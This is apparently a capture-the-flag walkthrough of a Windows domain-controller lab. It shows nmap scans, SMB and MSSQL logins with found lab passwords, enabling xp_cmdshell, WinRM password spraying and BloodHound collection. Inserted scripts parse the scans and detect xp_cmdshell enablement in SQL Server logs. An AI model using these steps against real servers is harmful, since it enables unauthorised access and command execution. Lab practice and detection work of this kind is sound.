Running NMAP
┌──(root㉿BOOK-2S4VUSLFM3)-[/home/surtesters]
└─# nmap 10.129.237.10 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-22 21:29 KST
Nmap scan report for 10.129.237.10
Host is up (0.29s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Nmap done: 1 IP address (1 host up) scanned in 1.46 seconds
┌──(root㉿BOOK-2S4VUSLFM3)-[/home/surtesters]
└─# nmap -p 53,88,135,139,389,445,464,593,636,1433,3268,3269 -sCV 10.129.237.10 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-22 21:31 KST
Nmap scan report for 10.129.237.10
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-22 12:31:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-04-22T12:32:52+00:00; -1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-22T12:32:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.237.10:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.237.10:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-04-22T12:32:52+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-04-22T12:29:20
|_Not valid after: 2055-04-22T12:29:20
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-04-22T12:32:52+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-22T12:32:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-22T12:32:16
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.82 seconds
Port 88 (Kerberos) open and port 389 (LDAP) open: this is a DC.
Miss this and you're sunk!
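The DC call above is made by eye from the port list. As an added example (not part of the original writeup), the script below parses a trimmed copy of that nmap -sCV output and turns the same observations into an inventory and a list of findings: Kerberos plus LDAP (plus the global catalog on 3268) marks a domain controller, the LDAP banner yields the domain name (nmap prints it with a trailing "0." artefact that is stripped), the ssl-cert block gives the hostname and certificate expiry, and the smb2-security-mode result tells us whether SMB signing is required. The port lines and cert dates are copied from the scan; the scan date used for the expiry check is the one shown in the scan header.

```python
import re
from datetime import datetime

# Constructed sample: a trimmed subset of the nmap -sCV output from the scan above.
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-22 12:31:27Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open globalcatLDAP
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
"""

# Scan time taken from the nmap header (2025-04-22 12:32 UTC per the ssl-date lines).
SCAN_DATE = datetime(2025, 4, 22, 12, 32)

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
DOMAIN_RE = re.compile(r"Domain:\s*([A-Za-z0-9.-]+)")
CN_RE = re.compile(r"commonName=([^\s,]+)")
NOT_AFTER_RE = re.compile(r"Not valid after:\s*(\S+)")
SIGNING_RE = re.compile(r"Message signing (.+)$")


def clean_domain(raw: str) -> str:
    # nmap's LDAP banner parser leaves a trailing "0." on the domain (e.g. "sequel.htb0.").
    return re.sub(r"0\.$", "", raw)


def parse_nmap(text: str) -> dict:
    """Build a small inventory from nmap -sCV output: open ports, AD domain, hostname,
    LDAPS certificate expiry and SMB signing mode."""
    inv = {"open_ports": {}, "domain": None, "hostname": None,
           "cert_not_after": None, "smb_signing": None}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, _, state, service, version = m.groups()
            if state == "open":
                inv["open_ports"][int(port)] = service
            if version and inv["domain"] is None:
                d = DOMAIN_RE.search(version)
                if d:
                    inv["domain"] = clean_domain(d.group(1))
            continue
        c = CN_RE.search(line)
        if c and inv["hostname"] is None:
            inv["hostname"] = c.group(1)          # first cert seen is the LDAP one
        n = NOT_AFTER_RE.search(line)
        if n and inv["cert_not_after"] is None:
            inv["cert_not_after"] = datetime.fromisoformat(n.group(1))
        s = SIGNING_RE.search(line)
        if s:
            inv["smb_signing"] = s.group(1).strip()
    return inv


def assess(inv: dict, scan_date: datetime, warn_days: int = 60) -> list:
    """Turn the inventory into findings a defender (or an assessor) would want flagged."""
    findings = []
    ports = inv["open_ports"]
    if 88 in ports and 389 in ports:
        role = "domain controller"
        if 3268 in ports:
            role += " (global catalog)"
        findings.append(f"{inv['hostname'] or 'host'} is a {role} for {inv['domain']}")
    if 1433 in ports and 88 in ports:
        findings.append("MSSQL (1433) exposed on the DC itself: a SQL compromise lands on the DC")
    if inv["cert_not_after"] is not None:
        days = (inv["cert_not_after"] - scan_date).days
        if days <= warn_days:
            findings.append(f"LDAPS certificate expires in {days} days")
    if inv["smb_signing"] and inv["smb_signing"] != "enabled and required":
        findings.append(f"SMB signing not required ({inv['smb_signing']})")
    return findings


if __name__ == "__main__":
    for f in assess(parse_nmap(SAMPLE_NMAP), SCAN_DATE):
        print("-", f)
```

The SMB signing check compares the whole phrase rather than testing for the word "required", because nmap's "enabled but not required" also contains that word; that is the case the check exists to catch.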
KxEPkKe6R8su
smbclient //sequel.htb/Accounting\ Department -U rose%KxEPkKe6R8su
When accounts.xlsx is opened with file recovery, it contains the MSSQL administrator account.
impacket-mssqlclient sa:'MSSQLP@ssw0rd!'@sequel.htb
After connecting,
running EXEC xp_cmdshell 'whoami'; reports that it is turned off, so enable xp_cmdshell:
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
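Enabling xp_cmdshell is loud from the server's point of view: sp_configure writes a "Configuration option '...' changed from 0 to 1" message to the SQL Server ERRORLOG, and the preceding login on the same spid tells you which account did it. The script below is an added example (not from the writeup) that scans ERRORLOG-style lines for that pattern and correlates it with the login on the same session. The line layout and message wording follow SQL Server's ERRORLOG format; the timestamps, spids and client address are constructed sample values. The watched option set goes a little beyond the page and also covers the other sp_configure switches that grant code execution from T-SQL.

```python
import re
from datetime import datetime

# Constructed ERRORLOG-style sample lines (message wording as SQL Server writes it;
# timestamps, spids and client address are made up for this example).
SAMPLE_ERRORLOG = """\
2025-04-22 12:38:10.11 spid57      Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 10.10.14.5]
2025-04-22 12:40:01.23 spid57      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-04-22 12:40:02.40 spid57      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-04-22 12:41:00.00 spid52      Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.
2025-04-22 13:10:30.05 spid60      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

LINE_RE = re.compile(r"^(\S+ \S+)\s+(spid\d+)\s+(.*)$")
CONFIG_RE = re.compile(r"Configuration option '([^']+)' changed from (\d+) to (\d+)")
LOGIN_RE = re.compile(r"Login succeeded for user '([^']+)'")

# sp_configure options that hand T-SQL a path to OS or CLR code execution.
# 'show advanced options' is the precondition for changing them but is not itself an alert.
WATCHED = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled",
           "Ad Hoc Distributed Queries"}


def parse_errorlog(text: str) -> list:
    """Split ERRORLOG lines into (timestamp, spid, message) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f")
        events.append((ts, m.group(2), m.group(3)))
    return events


def find_enablements(text: str) -> list:
    """Return one alert per watched option that was switched from 0 to 1,
    attributed to the most recent successful login on the same spid."""
    alerts = []
    last_login = {}  # spid -> login name
    for ts, spid, msg in parse_errorlog(text):
        lm = LOGIN_RE.search(msg)
        if lm:
            last_login[spid] = lm.group(1)
            continue
        cm = CONFIG_RE.search(msg)
        if not cm:
            continue
        option, old, new = cm.group(1), int(cm.group(2)), int(cm.group(3))
        if option in WATCHED and old == 0 and new == 1:
            alerts.append({"time": ts, "spid": spid, "option": option,
                           "user": last_login.get(spid, "unknown")})
    return alerts


if __name__ == "__main__":
    for a in find_enablements(SAMPLE_ERRORLOG):
        print(f"{a['time']} {a['spid']} {a['user']} enabled '{a['option']}'")
```

Only the 0-to-1 transition on a watched option fires; the later 1-to-0 line and the memory setting change are ignored. On a live server the same state can be confirmed directly with SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'.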
Set up a reverse shell connection!
This account cannot read ryan's user.txt.
Let's run winPEAS first! It yields nothing useful!
From the MSSQL installation data, another password, for sql_svc, is obtained:
WqSZAF6CysDQbGb3
Build a list of the passwords collected so far.
nxc winrm 10.129.237.10 -u ryan -p passlist.txt
User obtained!
To run BloodHound, register the dc01.sequel.htb we already know in the hosts file!
bloodhound-python -u ryan -p 'WqSZAF6CysDQbGb3' -d sequel.htb -dc DC01.sequel.htb -ns 10.129.237.10 -c All
Run that command!